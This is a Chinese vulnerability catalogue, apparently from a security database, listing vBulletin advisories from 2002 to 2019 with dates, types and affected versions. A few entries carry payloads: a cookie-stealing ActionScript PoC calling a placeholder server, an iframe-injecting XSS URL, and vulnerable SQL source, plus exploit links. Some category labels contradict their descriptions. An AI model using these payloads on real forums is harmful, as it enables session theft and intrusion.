应用安全

SSV-15384

Date: 
2004.11

漏洞类别：
SQL 注入

SSV-15476

Date:
2005.2

漏洞类别：
RCE

SSV-15482

Date:
2005.2

类型：
RCE

SSV-15475

Date:
2005.2

SSV-15647

Date：
2005.8

类型：
RCE

SSV-15669

Date：
2005.8

类型：
RCE

SSV-15743

漏洞类别：
SQL 注入

SSV-15988

Date:
2006.4

漏洞类别：
RCE

SSV-5410

Date:
2006.10

漏洞类别：
远程溢出

SSV-402

Date：
2006.11

漏洞类别：
嵌入恶意代码

影响范围：
Microsoft IE在处理vBulletin的附件时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行恶意代码。
远程攻击者可以将恶意代码保存为.pdf文件并在张贴时做为附件上传到论坛，这样用户在IE中打开附件时就会导致执行任意代码。
VBulletin VBulletin 3.5.4 目前厂商还没有提供补丁或者升级程序

SSV-1033

Date:
2006.12

漏洞类别：
SQL 注入

影响范围：
vBulletin在处理恶意SWF文件时存在漏洞，远程攻击者可能利用此漏洞获取用户机器的敏感信息。
如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话，就可能执行跨站脚本攻击，导致在日志文件中泄露基于cookie的认证凭据。
VBulletin VBulletin <= 3.6.4 目前厂商还没有提供补丁或者升级程序

PoC:
getURL(&quot;javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+

SSV-16875

Date：
提交时间：2007.02

漏洞类别：
SQL 注入

SSV-6259

Date：
2007.3

漏洞类别：
SQL 注入

SSV-6874

Date：2007.05

漏洞类别：
远程文件包含

SSV-7036

Date：
2007.07

漏洞类别：
SQL 注入

SSV-3433

Date：
2008.06

漏洞类别：
嵌入恶意代码

影响范围：
vBulletin管理控制面板（ACP）的登录页面没有正确地验证redirect参数，远程攻击者可以通过向论坛提交使用data: URI主题Base64编码的登录请求执行跨站脚本攻击。
VBulletin VBulletin 3.7.1 VBulletin VBulletin 3.6.10

SSV-3582

Date：
2008.07

漏洞类别：
SQL 注入

影响范围：

vBulletin管理控制面板的日志查看页面存在跨站脚本漏洞。如果用户请求了缺失的页面时，就会在管理区域创建日志，但没有过滤检查该日志的输入。脚本名称是从basename(PHP_SELF)获得的，操作是从_REQUEST['do']获得的，这两种方式都可能导致跨站脚本攻击。

VBulletin VBulletin 3.7.2 VBulletin VBulletin 3.6.10 PL2

SSV-3897

Date：
2008.8

漏洞类别：
跨站脚本

影响范围：

vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.

VBulletin VBulletin 3.7.2 PL1 VBulletin VBulletin 3.6.10 PL3

SSV-4467

Date：
2008.11

漏洞类别：
SQL 注入

影响范围：
vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数：

-------------------[original source code]------------------

if($_POST['do'] == 'saveholiday') { $vbulletin->input->clean_array_gpc('p', array( 'holidayid' => TYPE_INT, 'holidayinfo' => TYPE_ARRAY, 'month1' => TYPE_INT, 'day1' => TYPE_INT, 'month2' => TYPE_INT, 'day2' => TYPE_INT, 'period' => TYPE_INT, 'title' => TYPE_STR, 'description' => TYPE_STR, )); .. $db->query_write(" UPDATE " . TABLE_PREFIX . "holiday SET allowsmilies = " . $vbulletin->GPC['holidayinfo']['allowsmilies'] . ", recuroption = '" . $vbulletin->GPC['holidayinfo']['recuroption'] . "', recurring = " . $vbulletin->GPC['holidayinfo']['recurring'] . " WHERE holidayid = " . $vbulletin->GPC['holidayid'] );

------------------[/original source code]------------------

可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo，这允许远程攻击者通过提交恶意请求执行SQL注入攻击。

VBulletin 3.7.3 pl1

SSV-10072

Date：
2008.11

漏洞类别：
XSS

SSV-10205

Date：
2008.11

漏洞类别：
SQL 注入

SSV-5017

Date：
2009.4

漏洞类别：
嵌入恶意代码

影响范围：

vBulletin管理控制台的admincp/usertitle.php、admincp/image.php模块没有正确地验证用户所提交的 Users、Icons、Smilies、avatar等参数，远程攻击者可以提交包含有脚本代码的恶意标题名称导致注入并执行任意HTML代码。

VBulletin 3.8.0 RC2

SSV-11434

Date：
2009.5

漏洞类别：
SQL 注入

SSV-11634

Date：
2009.6

漏洞类别：
嵌入恶意代码

SSV-12444

Date：
2009.10

漏洞类别：
跨站脚本

SSV-18866

Date：
2009.12

漏洞类别：
SQL 注入

SSV-18867

Date:
2009.12

漏洞类别：
SQL 注入

SSV-18924

Date:
2010.1

漏洞类别：
跨站脚本

SSV-19032

Date:
2010.1

漏洞类别：
SQL 注入

SSV-19240

Date:
2010.3

漏洞类别：
跨站脚本

影响范围：
search.php在对用户提交数据处理上存在安全漏洞。
http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
vBulletin Version 4.0.2 等待官方发补丁

SSV-19339

Date：
2010.3

漏洞类别：
跨站脚本

影响范围：
当search_type设置为1的时候，vBulletin没有正确的过滤提交给search.php页面的query参数便返回给了用户，远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击，导致在用户浏览器会话中执行任意HTML和脚本代码。
VBulletin 4.0.2 

SSV-19441

Date：
2010.04

漏洞类别：
其他类型

SSV-19488

Date：
2010.4

漏洞类别：
跨站脚本

SSV-19578

Date：
2010.05

漏洞类别：
嵌入恶意代码

SSV-19580

Date:
2010.5

漏洞类别：
嵌入恶意代码

影响范围：

vBulletin在创建使用自定义标签的内容时没有正确地解析BBCode，这允许攻击者注入任意HTML和脚本代码，当查看恶意数据时就会在用户浏览器会话中执行所注入的代码。

VBulletin 4.0.3 VBulletin 3.8.4 PL2

SSV-20074

Date：
2010.8

漏洞类别：
越权访问

SSV-20090

Date：
2010.9

漏洞类别：
拒绝服务

SSV-20248

Date:
2010.11

漏洞类别：
跨站脚本

SSV-20257

Date:
2010.11

漏洞类别:
嵌入恶意代码

影响范围：
vBulletin的Profile Customization功能中存在持续性跨站脚本漏洞。在配置文件的自定义字段，可以输入颜色代码、rgb代码和图形。由于url()函数没有正确的过滤用户输入，导致vBulletin受跨站脚本攻击的影响。
VBulletin 4.0.8 

SSV-20360

Date:
2011.03

漏洞类别：
SQL 注入

SSV-20647

Date:
2011.6

漏洞类别：
SQL 注入

SSV-20753

Date:
2011.7

漏洞类别：
SQL 注入

SSV-23171

Date：
2011.11

漏洞类别：
远程文件包含

影响范围：

vBulletin在实现上存在多个远程文件包含漏洞，攻击者可利用这些漏洞获取敏感信息或在服务器进程中执行任意脚本代码，控制应用程序或计算机。

VBulletin 4.1.7

SSV-30029

Date:
2012.1

漏洞类别：
越权访问

影响范围：
vBulletin blog_post.php脚本不正确检查权限，远程攻击者可以利用漏洞张贴博客日志 0 vBulletin 3.x vBulletin Publishing Suite 4.x

SSV-60024

Date:
2012.4

漏洞类别：
SQL 注入

影响范围：
VBulletin announcement.php脚本不正确处理提交给announcementid的参数，攻击者可以提交恶意SQL查询，获得敏感数据库信息或控制应用系统 0 VBulletin 4.1.10

SSV-60086

Date:
2012.5

漏洞类别：
远程文件包含

SSV-60194

Date:
2012.6

漏洞类别：
SQL 注入

SSV-60393

Date:
2012.9

漏洞类别：
SQL 注入

影响范围：
 VBulletin 'blog_plugin_useradmin.php'脚本不正确过滤用户提交的输入，允许攻击者利用漏洞进行SQL注入攻击，可获得数据库信息或控制应用系统。 0 VBulletin 4.1.12 

SSV-60503

Date:
2012.12

漏洞类别：
SQL 注入

SSV-60717

Date:
2013.4

漏洞类别：
SQL 注入

影响范围：
VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28及其他版本在 'nodeid' 参数的实现上存在SQL注入漏洞，攻击者可利用此漏洞破坏应用，执行未授权操作

SSV-60917

Date:
2013.7

漏洞类别：
SQL 注入

SSV-61063

Date:
2013.10

漏洞类别：
越权访问

影响范围：
vBulletin 4.x.x及5.x.x允许攻击者利用vBulletin配置机制创建另一个管理员账户，即可具有vBulletin应用的完全控制权，然后控制其所支持的站点。要利用此漏洞，攻击者需要具有vBulletin upgrade.php准确的URL及用户ID 0 VBulletin 5.x VBulletin 4.x

SSV-75692 CVE-ID：CVE-2002-1660

Date:
2002-12

漏洞类别：
其他类型

SSV-75761

Date:
2014.7

漏洞类别：
其他类型

SSV-75843 CVE-ID：CVE-2004-1824

Date:
2004.12

漏洞类别：
其他类型

SSV-75855 CVE-ID：CVE-2002-2235

Date:
2002-12

漏洞类别：
其他类型

SSV-75890

Date:
2014.7

漏洞类别：
其他类型

SSV-76231

Date：
2014-07

漏洞类别：
其他类型

SSV-76398 CVE-ID：CVE-2003-0295

Date:
2003-06

漏洞类别：
其他类型

SSV-76455

Date:
2014.7

漏洞类别：
其他类型

SSV-63007 CVE-ID：CVE-2005-0429

Date:
2005-05

漏洞类别：
其他类型

SSV-63009 CVE-ID：CVE-2005-0429

Date:
2005-05

漏洞类别：
其他类型

 
SSV-63014  CVE-ID：CVE-2005-0511

Date:
2005-02

漏洞类别：
其他类型

SSV-63185

Date:
2014.7

漏洞类别：
其他类型

SSV-63212

Date:
2014.7

漏洞类别：
其他类型

SSV-63470

Date:
2014.7

漏洞类别：
其他类型

SSV-64472 CVE-ID：CVE-2007-0865

Date:
2007.2

漏洞类别：
其他类型

SSV-65777 CVE-ID：CVE-2008-4706

Date:
2008.10

漏洞类别：
其他类型

SSV-65949

Date:
2014.7

漏洞类别：
其他类型

　　

SSV-66028

Data:
2014.7

漏洞类别：
其他类型

SSV-66566

Date:
2014.7

漏洞类别：
其他类型

SSV-67672

Date:
2014.7

类型：
XSS Vulnerabilities

受影响版本：
vBulletin 3.5.2

SSV-67673

Date：
2014-07

类型：
XSS Vulnerability

受影响版本：
vBulletin 3.0.0

SSV-67674

Date:
2014.7

漏洞类型：
SQL Injection Vulnerability

受影响版本：
vBulletin 2.3 .x

SSV-67769 CVE-ID：CVE-2010-1077

Date：
2010.3

漏洞类型：
Local File Inclusion Vulnerability

受影响版本：
vBSEO 3.1.0 

SSV-68020

Date:
2010.3

漏洞类型：
Title XSS Vulnerability

受影响版本：
Vbulletin Blog 4.0.2 

SSV-68241

Date:
2010.4

类型：
DOS

PoC:

• http://www.exploit-db.com/exploits/12154

SSV-68269

Date:
2014.7

类型：
DOS

SSV-68366   |   CVE-2010-1499

Date:
2010.4

漏洞类型：
SQL Injection Exploit

受影响版本：
MusicBox 3.3 

SSV-69473

Date:
2014.7

漏洞类型：
faq.php Information Disclosure Vulnerability

受影响版本：
vBulletin(R) 3.8.6

SSV-69735

Date:
2010.8

漏洞类型：
Registration Bypass Vulnerability

受影响版本：
vBulletin 3.8.4 & 3.8.5 

SSV-70261

Date:
2010.11

漏洞类型：
PL1 XSS Filter Bypass within Profile Customization

受影响版本：
vBulletin 4.0.8 

SSV-71391 CVE-ID：CVE-2005-0511

Date:
2005.2

漏洞类型：
vBulletin misc.php Template Name Arbitrary Code Execution

受影响版本：
All versions of vBulletin prior to 3.0.7 are affected.

SSV-71425

Date:
2011.3

漏洞类型：
EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

受影响版本：
vBulletin 3.8.x 

SSV-71428    |    2011-03-07

Date:
2011.3

漏洞类型：
Local File Read

受影响版本：

EggAvatar 2.3.2 for vBulletin 3.8.x 

SSV-71590

Date:
2011.4

漏洞类型：
Point Market System 3.1x vbulletin plugin SQLi Vulnerability

受影响版本：
3.1x

SSV-71714

Date:
2011.5

漏洞类型：
vBulletin 4.0.x => 4.1.2 - (search.php) SQL Injection Vulnerability

受影响版本：
4.0.x

SSV-71893

Date:
2011.7

漏洞类型：
(messagegroupid) SQL Injection Vulnerability 

受影响版本：
Vbulletin 4.0.x => 4.1.3 

SSV-74805

Date:
2012.8

类型：
SQL Injection

影响版本:
4.0.2+

SSV-76775   |  CVE-2003-1031

Date:
2003.8

漏洞类型：
Register.PHP HTML Injection Vulnerability

影响范围：

vBulletin 3.0

SSV-77438

Date:
2004.2

类型：
Cross-Site Scripting Vulnerability

影响版本：
VBulletin 1.0/1.1/2.0.x/2.2.x

SSV-77441  CVE-ID：CVE-2004-2076

Date：
2004.12

类型：
Search.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 3.0 

SSV-77571 CVE-ID：CVE-2004-1823

Date:
2004.3

漏洞类型：
ForumDisplay.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 3.0 

SSV-77572 CVE-ID：CVE-2004-1823

Date:

2004.3

漏洞类型：

ShowThread.PHP Cross-Site Scripting Vulnerability

影响版本：
VBulletin 3.0 

SSV-77610

Date:

2004.03

漏洞类型：
Private.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 2.x 

SSV-77860 CVE-ID：CVE-2004-2288

Date：

2004.5

类型：
'index.php' User Interface Spoofing

影响版本：

vBulletin 1.0/2.x/3.0

SSV-77967  CVE-ID：CVE-2004-0620

Date:
2004.6

类型：

newreply.php WYSIWYG_HTML Parameter XSS

影响版本：
VBulletin 3.0.1 

SSV-78568  CVE-ID：CVE-2013-3522

Date:
2013.3

类型：
SQL Injection

影响版本：
vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 

SSV-79915 CVE-ID：CVE-2005-3019

Date:
2005.9

类型：

joinrequests.php request Parameter SQL Injection

影响版本：
VBulletin 1.0.1 lite/2.x/3.0 

SSV-79916  CVE-ID：CVE-2005-3019

Date:
2005.9

类型：

/admincp/user.php Multiple Parameter SQL Injection

影响版本：
VBulletin 1.0.1 lite/2.x/3.0 

SSV-79917  CVE-ID：CVE-2005-3019

Date:
2005.9

类型：

'/admincp/usertitle.php?usertitleid' SQL Injection

影响版本：

vBulletin 1.0.1 lite/2.x/3.0 

SSV-79918 CVE-ID：CVE-2005-3019

Date:
2005.9

类型：

'/admincp/usertools.php?ids' SQL Injection

 

影响版本：

vBulletin 1.0.1 lite/2.x/3.0 - 

SSV-79920   CVE-2005-3020

Date:
2005.9

类型：

'/admincp/css.php?group' Cross-Site Scripting

 

影响版本：

vBulletin 1.0.1 lite/2.x/3.0 - 

SSV-79921  CVE-2005-3020

Date:
2005.9

类型：

 /admincp/index.php Multiple Parameter XSS

 

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

SSV-79922 CVE-ID：CVE-2005-3020

Date:
2005.9

类型：

/admincp/user.php email Parameter XSS

 

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

SSV-79923   CVE-2005-3020

Date:
2005.9

类型：

/admincp/language.php goto Parameter XSS

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

SSV-79924  CVE-2005-3020

Date:
2005.9

类型：

/admincp/modlog.php orderby Parameter XSS

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

SSV-79925 CVE-ID：CVE-2005-3020

Date:
2005.9

类型：
/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

SSV-80360

Date:
2013.7

类型：

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

 

影响版本：

Version: vBulletin 3.8.x, vBulletin 4.x.x 

SSV-80361

Date:
2013.7

类型：

vBulletin vBShout Mod - Persistent Cross-Site Scripting

 

影响版本：

Version:vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x 

 

SSV-80640

Date:
2006.02

类型：

vBulletin 3.5.2 - Event Title HTML Injection

影响版本：

This issue is reported to affect vBulletin 3.5.2. Earlier versions may also be affected.

SSV-80956 CVE-ID：CVE-2006-1040

Date:
2006.03

类型：

vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection

影响版本：

This issue is reported to affect vBulletin versions 3.0.12 through 3.5.3. Other versions may also be affected.

SSV-81184 CVE-ID：CVE-2006-1673

Date:
2006.04

类型：

vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting

影响版本：

Version 3.5.1 is vulnerable; other versions may also be affected.

SSV-81519 CVE-ID：CVE-2006-2805

Date:
2006.05

类型：

vBulletin 3.0.10 - 'Portal.php' SQL Injection

 

影响版本：

vBulletin 3.0.10

SSV-81612

Date:
2006.06

类型：

vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities

影响版本：

vBulletin 2.x/3.x

SSV-81657   CVE-2006-3253

Date:
2006.06

类型：

Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability

影响版本：

Vbulletin 3.0.9/3.5.x 

SSV-81913 CVE-ID：CVE-2006-4273

Date:
2006.06

类型：

VBulletin 3.0.14 global.php Encoded URL XSS

影响版本：

VBulletin 3.0.14

SSV-82247 CVE-ID：CVE-2006-5104

Date:
2006.09

类型：

VBulletin 2.3.x Global.PHP SQL Injection Vulnerability

影响版本：

VBulletin 2.3.x

SSV-82617 CVE-ID：CVE-2006-6040

Date:
2006.11

类型：

vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities

影响版本：

Versions 3.6.0 to 3.6.3 are vulnerable; other versions may also be affected.

SSV-82849  CVE-ID：CVE-2006-6779

Date:
2006.12

类型：

vBulletin 3.5.x/3.6.x - SWF Script Injection

 

影响版本：

vBulletin 3.5.x/3.6.x

SSV-83511   CVE-2007-2908

Date:
2007-05

类型：
vBulletin 3.6.6 - 'calendar.php' HTML Injection

影响版本：
vBulletin 3.6.6 

SSV-83653 CVE-ID：CVE-2013-3522

Date:
2013-12

类型：
vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)

影响版本：
vBulletin 5

SSV-85223 CVE-ID：CVE-2008-2744

Date:
2008.6

类型:
vBulletin 3.6.10/3.7.1 - 'redirect' Cross-Site Scripting

影响版本：
vBulletin 3.7.1 and 3.6.10 are vulnerable; other versions may also be affected.

SSV-85252

Date:
2008-06

类型：

vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting

 

影响版本：

vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected. 

SSV-85324 CVE-ID：CVE-2008-3184

Date:
2008.7

类型：

vBulletin 3.7.1 - 'admincp/faq.php?Injection adminlog.php' Cross-Site Scripting

 

影响版本：

Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable. 

SSV-85580 CVE-ID：CVE-2008-3773

Date:
2008.8

类型：

vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting

 

影响版本：

vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected. 

SSV-86755

Date：
2010-01

类型：
vBulletin 4.0.1 - 'misc.php' SQL Injection

影响版本：
vBulletin 4.0.1. is vulnerable; other versions may also be affected. 

SSV-86826

Date:
2010-2

类型：

vBulletin Adsense Component - 'viewpage.php' SQL Injection

SSV-86829

Date:
2010-2

类型：
vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities

影响版本：
These issues affect vBulletin 3.0.0 through 3.5.4.

SSV-86865

Date:
2010.2

类型：
vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities

影响版本：
These issues affect vBulletin 4.0.2; other versions may also be affected. 

SSV-86970

Date：
2010-03

类型：
vBulletin 4.0.2 - Search Cross-Site Scripting

影响版本：
vBulletin 4.0.2 is vulnerable. This issue does not affect vBulletin 3.x versions.

SSV-87029

Date:
2010-04

类型：
vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting

SSV-87221

Date:
2014.9

类型：
vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

影响版本：
vBulletin 4.0.x - 4.1.2 

SSV-87239

Date:
2014.9

类型：
vBulletin 5.1.X - Persistent Cross Site Scripting

影响版本：
vBulletin 5.1.X

SSV-87387

Date:
2014.11

类型：
vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection

影响版本：
vBulletin 4.x

SSV-87389  CVE-ID：CVE-2014-2023

Date：
2014-11

类型：
vBulletin Tapatalk - Blind SQL Injection

SSV-89707  CVE-ID：CVE-2015-7808

Date:
2015.11

类型：

vBulletin 5.x.x 远程任意代码执行漏洞

影响版本：
vBulletin 5.x.x

社工：
http://www.zoomeye.org/search?q=app:vbulletin

SSV-91013

Date:
2016.3

类型：
vBulletin rce 未授权访问和SSRF漏洞

SSV-92266  CVE-ID：CVE-2016-6483

Date:
2016.8

类型：
VBULLETIN 5.2.0/5.2.1/5.2.2 MEDIA UPLOAD SSRF PRIVILEGE ESCALATION

影响版本：
VBULLETIN 5.2.0/5.2.1/5.2.2

vBulletin <= 5.2.2

vBulletin <= 4.2.3

vBulletin <= 3.8.9

SSV-92354 CVE-ID：CVE-2016-6195

Date:
2016.8

类型：
vBulletin /forumrunner/request.php SQL注入漏洞

影响版本：

3.6.x ～ 4.2.1

4.2.2 ～ 4.2.2 Patch Level 5

4.2.3 ～ 4.2.3 Patch Level 1

SSV-96981 CVE-ID：CVE-2017-17672

Date:
2017.12

类型：
vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion(CVE-2017-17672)

影响版本：
version 5.x

SSV-96982

Date:
2017.12

类型：
vBulletin routestring Unauthenticated Remote Code Execution

影响版本：
version 5.x

SSV-98077

Date:
2019.9

类型：
vBulletin 5.x 0day pre-auth RCE exploit

影响版本：
version 5.x  | versions from 5.0.0 till 5.5.4

CVE-2019-16759

Date:
2019.9

类型：
vBulletin 5.x 0day pre-auth RCE exploit

影响版本：
vBulletin 5.x  | from 5.0.0 till 5.5.4

PoC:
https://seclists.org/fulldisclosure/2019/Sep/31

SSV-98084  CVE-2019-17132

Date:
2019.10

类型： 
SQL | RCE

影响范围：
vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability

EXP |Patch released:
https://www.exploit-db.com/exploits/47475